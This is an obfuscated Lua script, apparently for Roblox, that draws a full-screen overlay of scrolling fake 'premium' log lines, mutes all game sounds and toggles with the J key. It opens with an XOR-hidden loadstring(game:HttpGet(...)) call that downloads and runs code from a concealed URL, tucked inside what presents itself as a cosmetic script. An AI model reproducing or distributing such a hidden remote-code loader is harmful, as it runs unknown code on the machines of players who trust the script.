--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v47,v48) local v49={};for v56=1, #v47 do v6(v49,v0(v4(v1(v2(v47,v56,v56 + 1 )),v1(v2(v48,1 + (v56% #v48) ,1 + (v56% #v48) + 1 )))%256 ));end return v5(v49);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\193\194\200\49\227\189\222\80\208\211\203\106\193\236\230\4\232\203\227\125\169\169\198\9","\126\177\163\187\69\134\219\167")))();if  not game:IsLoaded() then game.Loaded:Wait();end local v8=game.Players.LocalPlayer;local v9=v8:WaitForChild(v7("\19\193\43\220\249\49\234\63\204","\156\67\173\74\165"));local v10=game:GetService(v7("\1\164\76\4\149\40\86\33\163\122\19\174\48\79\55\178","\38\84\215\41\118\220\70"));if v9:FindFirstChild(v7("\99\55\0\45\206\98\51\15\59\203\125\41\4\59\208\113\58","\158\48\118\66\114")) then v9.SAB_PREMIUM_FINAL:Destroy();end local v11=Instance.new(v7("\152\39\2\51\118\171\220\190\45","\155\203\68\112\86\19\197"));v11.Name=v7("\117\252\20\195\112\74\192\213\111\232\27\195\102\81\203\217\106","\152\38\189\86\156\32\24\133");v11.IgnoreGuiInset=true;v11.DisplayOrder=1327983 -327984 ;v11.Parent=v9;local v16=Instance.new(v7("\218\69\166\75\249","\38\156\55\199"));v16.Size=UDim2.new(1 + 0 ,438 -(262 + 176) ,1,1721 -(345 + 1376) );v16.BackgroundColor3=Color3.fromRGB(2,690 -(198 + 490) ,2);v16.BorderSizePixel=0;v16.Parent=v11;local v21={v7("\129\83\86\13\48\64\211\109\143","\35\200\29\28\72\115\20\154"),v7("\59\134\225\254\190\31\29\55\152","\84\121\223\177\191\237\76"),v7("\151\121\232\132\19\126\23","\161\219\54\169\192\90\48\80"),v7("\108\108\35\23\112\114\52\12\103\101","\69\41\34\96"),v7("\147\243\227\35\47\2\134\234\249\45","\75\220\163\183\106\98"),v7("\42\149\164\28\240\44\157","\185\98\218\235\87"),v7("\237\25\19\197\246\131\229\27","\202\171\92\71\134\190"),v7("\26\241\3\167\15\232\2\175","\232\73\161\76"),v7("\152\245\103\124\48\146\247\101","\126\219\185\34\61"),v7("\40\235\125\64\71\71\199\206\34\233","\135\108\174\62\18\30\23\147")};local v22={v7("\151\199\30\226\39\141\27\226\151\221","\167\214\137\74\171\120\206\83"),v7("\160\213\0\115\221\139\180\212\19\105\217","\199\235\144\82\61\152"),v7("\53\51\151\15\34\36\134\14\41\49\144\5\34","\75\103\118\217"),v7("\234\113\93\59\139\39\248\103\68\38\156\63\234","\126\167\52\16\116\217"),v7("\228\1\3\161\152\38\223\228\7\5\174\128","\156\168\78\64\224\212\121"),v7("\52\203\151\248\34\220\154\253\46\202\128","\174\103\142\197"),v7("\116\17\121\10\10\112\199\123\7\123\13\9\123","\152\54\72\63\88\69\62"),v7("\228\229\205\119\241\240\209\122\248\235\217","\60\180\164\142"),v7("\112\105\44\13\24\201\51\108\127","\114\56\62\101\73\71\141"),v7("\138\204\246\235\140\204\232","\164\216\137\187")};local v23={v7("\233\201\26\143","\107\178\134\81\210\198\158"),v7("\3\61\183\229\137\29\61\177\251","\202\88\110\226\166"),v7("\248\46\161\195\227\245\42\191","\170\163\111\226\151"),v7("\42\2\151\25\106\14\20","\73\113\80\210\88\46\87"),v7("\186\31\249\51\197\173\9\240","\135\225\76\173\114"),v7("\33\201\151\158\137\128","\199\122\141\216\208\204\221")};local v24=Instance.new(v7("\158\222\2\255\116\250\164\211\23\214\106\247\160\216","\150\205\189\112\144\24"));v24.Size=UDim2.new(0.5 + 0 ,0,0.8,0 + 0 );v24.Position=UDim2.new(0.05 + 0 ,0,0.1,0 -0 );v24.BackgroundTransparency=1 -0 ;v24.ScrollBarThickness=0 -0 ;v24.Parent=v16;local v30=Instance.new(v7("\16\173\147\69\23\156\61\17\60\139\170\88","\112\69\228\223\44\100\232\113"));v30.VerticalAlignment=Enum.VerticalAlignment.Bottom;v30.Parent=v24;local v34=Instance.new(v7("\224\26\31\199\154\125\132\209\19","\230\180\127\103\179\214\28"));v34.Size=UDim2.new(0 + 0 ,400,0 + 0 ,50);v34.Position=UDim2.new(396.75 -(115 + 281) , -(465 -265),0.5, -25);v34.BackgroundTransparency=1;v34.TextColor3=Color3.fromRGB(255,255,212 + 43 );v34.TextSize=84 -49 ;v34.Font=Enum.Font.Code;v34.Text=v7("\191\36\125\6\212\115\197\161\44\106\107","\128\236\101\63\38\132\33");v34.Parent=v16;local v44=true;local function v45() for v57,v58 in pairs(game:GetDescendants()) do if v58:IsA(v7("\159\166\4\74\178","\175\204\201\113\36\214\139")) then v58.Volume=0;end end end game.DescendantAdded:Connect(function(v50) if (v44 and v50:IsA(v7("\116\195\32\210\0","\100\39\172\85\188"))) then v50.Volume=0;end end);v45();local function v46() local v51=0;local v52;local v53;while true do if ((7 -5)==v51) then v52.TextXAlignment=Enum.TextXAlignment.Left;v52.TextTransparency=868 -(550 + 317) ;v53=v23[math.random( #v23)]   .. " "   .. v21[math.random( #v21)]   .. "_"   .. v22[math.random( #v22)] ;v51=3 -0 ;end if ((3 -0)==v51) then v52.Text=v7("\184\133","\93\134\165\173")   .. v53   .. v7("\254\188\143\140\122\158\170","\30\222\146\161\162\90\174\210")   .. string.upper(string.format(v7("\160\86","\106\133\46\16"),math.random(100000,2515031 -1615031 ))) ;v52.Parent=v24;game:GetService(v7("\108\55\118\249\84\115\93\50\101\245\89\69","\32\56\64\19\156\58")):Create(v52,TweenInfo.new(285.3 -(134 + 151) ),{[v7("\110\205\253\66\110\224\129\84\219\245\87\72\247\142\89\209","\224\58\168\133\54\58\146")]=1665 -(970 + 695) }):Play();v51=7 -3 ;end if (v51==(1991 -(582 + 1408))) then v52.TextColor3=Color3.fromRGB(0 -0 ,320 -65 ,140);v52.TextSize=48 -35 ;v52.Font=Enum.Font.Code;v51=1826 -(1195 + 629) ;end if ((0 -0)==v51) then v52=Instance.new(v7("\153\125\161\148\31\172\122\188\140","\83\205\24\217\224"));v52.Size=UDim2.new(242 -(187 + 54) ,780 -(162 + 618) ,0 + 0 ,12 + 6 );v52.BackgroundTransparency=1 -0 ;v51=1;end if (v51==(6 -2)) then if ( #v24:GetChildren()>(3 + 27)) then v24:GetChildren()[2]:Destroy();end break;end end end task.spawn(function() while true do local v59=1636 -(1373 + 263) ;while true do if (v59==(1000 -(451 + 549))) then if v44 then local v75=0 + 0 ;while true do if ((0 -0)==v75) then v46();v45();break;end end end task.wait(math.random(0.4 -0 ,1384.9 -(746 + 638) ));break;end end end end);v10.InputBegan:Connect(function(v54,v55) if ( not v55 and (v54.KeyCode==Enum.KeyCode.J)) then local v61=0;while true do if (v61==1) then if v44 then v45();end break;end if (v61==(0 + 0)) then v44= not v44;v16.Visible=v44;v61=1;end end end end);
